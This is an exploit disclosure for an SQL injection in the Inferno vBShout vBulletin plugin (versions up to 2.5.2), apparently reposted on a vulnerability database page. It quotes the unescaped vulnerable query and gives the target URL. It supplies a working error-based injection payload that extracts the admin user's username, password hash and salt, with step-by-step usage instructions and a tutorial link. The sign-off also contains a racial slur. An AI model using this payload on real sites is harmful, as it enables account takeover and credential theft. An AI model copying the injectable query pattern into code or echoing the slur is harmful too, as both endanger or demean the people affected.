====================================================================
# Inferno vBShout SQLI 0day <= 2.5.2 #
====================================================================
______ _ ______
/ ____/____(_) __/ /____ _____
/ / __/ ___/ / /_/ __/ _ \/ ___/
/ /_/ / / / / __/ /_/ __/ /
\____/_/ /_/_/ \__/\___/_/
====================================================================
# Inferno vBShout SQLI 0day <= 2.5.2 #
====================================================================
# Found by: Luit
# Site: http://grifter.org
# E-Mail: [email protected]
# Date: 14/08/2012
====================================================================
# Vulnerable Code - infernoshout.php & inferno_settings.php #
====================================================================
$commands = unserialize($this->settings['s_commands']);
if ($this->vbulletin->db->affected_rows() < 1 && !$this->vbulletin->db->query_first("select * from " . TABLE_PREFIX . "infernoshoutusers where s_user='{$this->vbulletin->userinfo['userid']}'"))
{
$this->vbulletin->db->query("
insert into " . TABLE_PREFIX . "infernoshoutusers
(s_user, s_commands)
values
({$this->vbulletin->userinfo['userid']}, '" . serialize($commands) . "')
");
}
====================================================================
# Exploit Location #
====================================================================
# Location: http://site.com/infernoshout.php?do=options&area=commands
====================================================================
# SQL Injection #
====================================================================
' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#
====================================================================
# How to use #
====================================================================
Insert SQL injection into the first "Command Input" box and enter anything into the first "Command Output" box, hit save settings, you will be treated with a database error, view the page source and scroll to the bottom of the page, you will see some quoted text containing the data you want.
====================================================================
# Video Tutorial #
====================================================================
http://www.youtube.com/watch?v=g70_JaKnBbw
====================================================================
# Peace out nigga #
====================================================================
# Found by: Luit
# Site: http://grifter.org
# E-Mail: [email protected]
====================================================================
# Peace out nigga #
====================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation